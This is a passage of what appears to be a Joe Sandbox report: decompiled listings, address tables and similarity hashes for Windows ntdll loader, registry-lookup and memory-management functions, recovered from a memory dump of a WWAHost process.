												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03968A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3a45c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3a45c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0399F380(_t136, 0x3931184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03972280(_t108, 0x3a486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E039861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03A29D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0396FFB0(_t118, _t156, 0x3a486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03999A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                              0x03968799
                                              0x0396879d
                                              0x039687a1
                                              0x039687a3
                                              0x039687a8
                                              0x039687c3
                                              0x039687c3
                                              0x039687c8
                                              0x039687d1
                                              0x039687d4
                                              0x039687d8
                                              0x039687e5
                                              0x039687ec
                                              0x039b9bfe
                                              0x039b9c00
                                              0x039b9c02
                                              0x039b9c08
                                              0x039b9c0d
                                              0x039b9c0f
                                              0x039b9c14
                                              0x039b9c2d
                                              0x039b9c32
                                              0x039b9c37
                                              0x039b9c3a
                                              0x039b9c3c
                                              0x039b9c42
                                              0x039b9c42
                                              0x039b9c3c
                                              0x039b9c02
                                              0x039687da
                                              0x039687df
                                              0x039687e3
                                              0x00000000
                                              0x00000000
                                              0x039687e3
                                              0x039687f2
                                              0x00000000
                                              0x039687fb
                                              0x039687fd
                                              0x039687fe
                                              0x0396880e
                                              0x0396880f
                                              0x03968810
                                              0x03968814
                                              0x0396881a
                                              0x0396881c
                                              0x0396881f
                                              0x03968821
                                              0x03968822
                                              0x03968824
                                              0x03968826
                                              0x0396882c
                                              0x0396882e
                                              0x039b9c48
                                              0x039b9c48
                                              0x03968834
                                              0x03968834
                                              0x03968837
                                              0x00000000
                                              0x00000000
                                              0x03968837
                                              0x0396882e
                                              0x0396883d
                                              0x03968840
                                              0x03968843
                                              0x03968846
                                              0x03968849
                                              0x0396884c
                                              0x0396884e
                                              0x03968850
                                              0x03968852
                                              0x03968854
                                              0x03968857
                                              0x039688b4
                                              0x039688b6
                                              0x039688b6
                                              0x03968859
                                              0x03968859
                                              0x03968859
                                              0x03968861
                                              0x03968866
                                              0x0396886a
                                              0x0396893d
                                              0x03968941
                                              0x00000000
                                              0x03968947
                                              0x03968947
                                              0x0396894a
                                              0x0396894c
                                              0x00000000
                                              0x03968952
                                              0x03968955
                                              0x0396895a
                                              0x0396895d
                                              0x0396895d
                                              0x0396895f
                                              0x03968961
                                              0x03968961
                                              0x03968968
                                              0x00000000
                                              0x00000000
                                              0x0396896a
                                              0x0396896b
                                              0x0396896e
                                              0x00000000
                                              0x03968970
                                              0x03968970
                                              0x03968970
                                              0x03968970
                                              0x03968972
                                              0x03968972
                                              0x03968974
                                              0x00000000
                                              0x0396897a
                                              0x0396897a
                                              0x0396897d
                                              0x00000000
                                              0x03968983
                                              0x039b9c65
                                              0x039b9c6d
                                              0x039b9c72
                                              0x039b9c75
                                              0x039b9c75
                                              0x039b9c82
                                              0x039b9c86
                                              0x039b9c87
                                              0x039b9c88
                                              0x039b9c89
                                              0x039b9c8c
                                              0x039b9c90
                                              0x039b9c95
                                              0x039b9c97
                                              0x039b9ca0
                                              0x039b9ca3
                                              0x039b9ca9
                                              0x039b9ca9
                                              0x00000000
                                              0x039b9ca9
                                              0x039b9ca3
                                              0x00000000
                                              0x039b9c97
                                              0x0396897d
                                              0x00000000
                                              0x03968974
                                              0x03968988
                                              0x03968992
                                              0x03968996
                                              0x00000000
                                              0x03968996
                                              0x0396894c
                                              0x00000000
                                              0x03968870
                                              0x0396887b
                                              0x0396887d
                                              0x0396887f
                                              0x03968881
                                              0x03968884
                                              0x03968884
                                              0x03968886
                                              0x03968889
                                              0x0396888c
                                              0x0396888e
                                              0x03968891
                                              0x03968891
                                              0x03968898
                                              0x00000000
                                              0x00000000
                                              0x0396889a
                                              0x0396889b
                                              0x0396889e
                                              0x00000000
                                              0x00000000
                                              0x039688a0
                                              0x039688a8
                                              0x039688b0
                                              0x039688b2
                                              0x039688d3
                                              0x039688d5
                                              0x00000000
                                              0x039688d7
                                              0x039688db
                                              0x039688dc
                                              0x039688e0
                                              0x039688e8
                                              0x039688ee
                                              0x039688f0
                                              0x039688f3
                                              0x039688fc
                                              0x03968901
                                              0x03968906
                                              0x0396890c
                                              0x0396890c
                                              0x0396890f
                                              0x03968916
                                              0x03968917
                                              0x03968918
                                              0x03968919
                                              0x0396891a
                                              0x0396891f
                                              0x03968921
                                              0x039b9c52
                                              0x039b9c55
                                              0x039b9c5b
                                              0x039b9cac
                                              0x039b9cc0
                                              0x039b9cc0
                                              0x039b9c55
                                              0x03968927
                                              0x03968927
                                              0x0396892f
                                              0x03968933
                                              0x00000000
                                              0x039688f5
                                              0x039688f5
                                              0x00000000
                                              0x039688f7
                                              0x039688f7
                                              0x039688fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039688fa
                                              0x039688f5
                                              0x039688f3
                                              0x00000000
                                              0x039688d5
                                              0x00000000
                                              0x039688b2
                                              0x039688c9
                                              0x00000000
                                              0x039688c9
                                              0x0396887f
                                              0x0396886a
                                              0x03968857
                                              0x03968852
                                              0x039688bf
                                              0x039688bf
                                              0x039687aa
                                              0x039687ad
                                              0x039687ae
                                              0x039687b4
                                              0x039687b5
                                              0x039687b6
                                              0x039687b8
                                              0x039687bd
                                              0x039687c1
                                              0x039687f4
                                              0x039687fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039687c1
                                              0x00000000

                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 039B9C28
                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 039B9C18
                                              • LdrpDoPostSnapWork, xrefs: 039B9C1E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-1948996284
                                              • Opcode ID: 3dc3bdb5c90e94ce89f416080937f6982cff9afc9451fb0d362ae33f2f831911
                                              • Instruction ID: 06bdd5658fe696de4410a2f1ab5bca721d842219751e8fb54bcc7200a9b390a0
                                              • Opcode Fuzzy Hash: 3dc3bdb5c90e94ce89f416080937f6982cff9afc9451fb0d362ae33f2f831911
                                              • Instruction Fuzzy Hash: F7911475A0631AEFDF28DF58C481ABAB3BDFF85350B1845A9D915AB241D730ED01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03967E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E03967E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0396CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0395C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3a45780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E039D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3a45780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03977D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03977D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E039D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03977D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03977D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E039D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0398A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0395B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                              0x03967e4c
                                              0x03967e50
                                              0x03967e55
                                              0x03967e58
                                              0x03967e5d
                                              0x03967e71
                                              0x03967f33
                                              0x03967e77
                                              0x03967e77
                                              0x03967e79
                                              0x03967e79
                                              0x03967e7e
                                              0x03967f45
                                              0x039b9848
                                              0x00000000
                                              0x039b9848
                                              0x03967f4e
                                              0x03967f53
                                              0x03967f5a
                                              0x00000000
                                              0x00000000
                                              0x039b985a
                                              0x039b9862
                                              0x039b9866
                                              0x00000000
                                              0x039b986c
                                              0x00000000
                                              0x039b986c
                                              0x03967e84
                                              0x03967e84
                                              0x03967e8d
                                              0x039b9871
                                              0x03967eb8
                                              0x03967ec0
                                              0x03967ec0
                                              0x03967e9a
                                              0x039b987e
                                              0x00000000
                                              0x00000000
                                              0x039b9884
                                              0x039b988b
                                              0x039b98a7
                                              0x039b98ac
                                              0x039b98b1
                                              0x039b98b6
                                              0x039b98b8
                                              0x039b98b8
                                              0x039b98b9
                                              0x00000000
                                              0x039b98b9
                                              0x03967ea0
                                              0x03967ea7
                                              0x00000000
                                              0x00000000
                                              0x03967eac
                                              0x03967eb1
                                              0x03967ec6
                                              0x03967ed0
                                              0x039b98cc
                                              0x03967ed6
                                              0x03967ed6
                                              0x03967ed6
                                              0x03967ede
                                              0x03967ee3
                                              0x039b98e3
                                              0x039b98f0
                                              0x039b9902
                                              0x039b98f2
                                              0x039b98fb
                                              0x039b98fb
                                              0x039b9907
                                              0x039b991d
                                              0x039b991d
                                              0x039b9907
                                              0x039b98e3
                                              0x03967ef0
                                              0x03967f14
                                              0x03967f14
                                              0x03967f1e
                                              0x039b9946
                                              0x03967f24
                                              0x03967f24
                                              0x03967f24
                                              0x03967f2c
                                              0x039b996a
                                              0x039b9975
                                              0x039b9975
                                              0x039b997e
                                              0x039b9993
                                              0x039b9993
                                              0x039b997e
                                              0x00000000
                                              0x03967ef2
                                              0x03967efc
                                              0x03967f0a
                                              0x03967f0e
                                              0x039b9933
                                              0x00000000
                                              0x039b9933
                                              0x00000000
                                              0x03967f0e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03967eb1

                                              Strings
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 039B9891
                                              • LdrpCompleteMapModule, xrefs: 039B9898
                                              • minkernel\ntdll\ldrmap.c, xrefs: 039B98A2
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: ade9953d4e529c590fc4e80e327c291fdc070c1d3cb194b9a50d01ab3de97280
                                              • Instruction ID: ca8f9051286801372547a534b6f559dc6010d724d27ea2a62eea0ad523419b72
                                              • Opcode Fuzzy Hash: ade9953d4e529c590fc4e80e327c291fdc070c1d3cb194b9a50d01ab3de97280
                                              • Instruction Fuzzy Hash: F0513535A017459FD722CBA8CA44B6EB7F8EF41758F080AA9E9519B3E1D734ED04CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E0395E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0395F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E039995D0();
						}
						if(_t78 != 0) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0399FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0399BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03999600();
					if(_t97 < 0) {
						goto L6;
					}
					E0399BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0395F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0399BB40(_t83, _t102 + 0x24, _t78);
								if(L039643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0399BB40(_t84, _t102 + 0x24, _t94);
									if(L039643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                              0x0395e620
                                              0x0395e628
                                              0x0395e62f
                                              0x0395e631
                                              0x0395e635
                                              0x0395e637
                                              0x0395e63e
                                              0x039b5503
                                              0x039b5503
                                              0x0395e64c
                                              0x0395e64c
                                              0x0395e651
                                              0x00000000
                                              0x00000000
                                              0x0395e661
                                              0x0395e665
                                              0x039b542a
                                              0x0395e715
                                              0x0395e71a
                                              0x0395e71c
                                              0x0395e720
                                              0x0395e720
                                              0x0395e727
                                              0x0395e736
                                              0x0395e736
                                              0x0395e743
                                              0x0395e743
                                              0x0395e673
                                              0x0395e678
                                              0x0395e67d
                                              0x0395e682
                                              0x0395e685
                                              0x0395e692
                                              0x0395e69b
                                              0x0395e6a3
                                              0x0395e6ad
                                              0x0395e6b1
                                              0x0395e6b2
                                              0x0395e6bb
                                              0x0395e6bf
                                              0x0395e6c0
                                              0x0395e6c8
                                              0x0395e6cc
                                              0x0395e6d5
                                              0x0395e6d9
                                              0x00000000
                                              0x00000000
                                              0x0395e6e5
                                              0x0395e6ea
                                              0x0395e6f9
                                              0x0395e70b
                                              0x0395e70f
                                              0x039b5439
                                              0x039b545e
                                              0x039b545e
                                              0x00000000
                                              0x039b545e
                                              0x039b543b
                                              0x039b543e
                                              0x039b5440
                                              0x039b5445
                                              0x039b5472
                                              0x039b5475
                                              0x039b548d
                                              0x039b5493
                                              0x039b54a9
                                              0x00000000
                                              0x00000000
                                              0x039b54ab
                                              0x039b54b4
                                              0x039b54bc
                                              0x039b54c8
                                              0x039b54de
                                              0x039b54fb
                                              0x039b54e0
                                              0x039b54e6
                                              0x039b54eb
                                              0x039b54eb
                                              0x039b54de
                                              0x00000000
                                              0x039b54bc
                                              0x039b5477
                                              0x039b547a
                                              0x039b5480
                                              0x039b5483
                                              0x039b5486
                                              0x039b548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b5447
                                              0x039b5447
                                              0x039b5447
                                              0x039b5447
                                              0x039b544e
                                              0x00000000
                                              0x00000000
                                              0x039b5450
                                              0x039b5452
                                              0x039b5455
                                              0x039b545a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b545c
                                              0x039b546a
                                              0x039b546d
                                              0x039b546f
                                              0x00000000
                                              0x039b546f
                                              0x0395e70f

                                              Strings
                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0395E68C
                                              • InstallLanguageFallback, xrefs: 0395E6DB
                                              • @, xrefs: 0395E6C0
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                              • API String ID: 0-1757540487
                                              • Opcode ID: 22cbf65207c4a9de8e18869f9d16f23f5040645230792ae25131212a6557fe1d
                                              • Instruction ID: dd6e32ed1136dcb768f03a2d48abb1137ad9d6569bdfd68171724dd790fcd9ca
                                              • Opcode Fuzzy Hash: 22cbf65207c4a9de8e18869f9d16f23f5040645230792ae25131212a6557fe1d
                                              • Instruction Fuzzy Hash: 9751E0B65083059BD714DF69C440ABBB3EDBF89654F0A092EF885DB240F734DA44C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 60%
                                              			E03A1E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E03A1BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E03A1BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E03A1AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03999730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E03A1A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E03A1A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03999730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E03A1A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E03A1A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03972280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0396B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0396FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03977D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E03A0FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                              0x03a1e547
                                              0x03a1e549
                                              0x03a1e54f
                                              0x03a1e553
                                              0x03a1e557
                                              0x03a1e55a
                                              0x03a1e55c
                                              0x03a1e55f
                                              0x03a1e561
                                              0x03a1e567
                                              0x03a1e56b
                                              0x03a1e7e2
                                              0x00000000
                                              0x03a1e571
                                              0x03a1e575
                                              0x03a1e577
                                              0x03a1e57b
                                              0x03a1e57c
                                              0x03a1e57d
                                              0x03a1e57e
                                              0x03a1e57f
                                              0x03a1e588
                                              0x03a1e58f
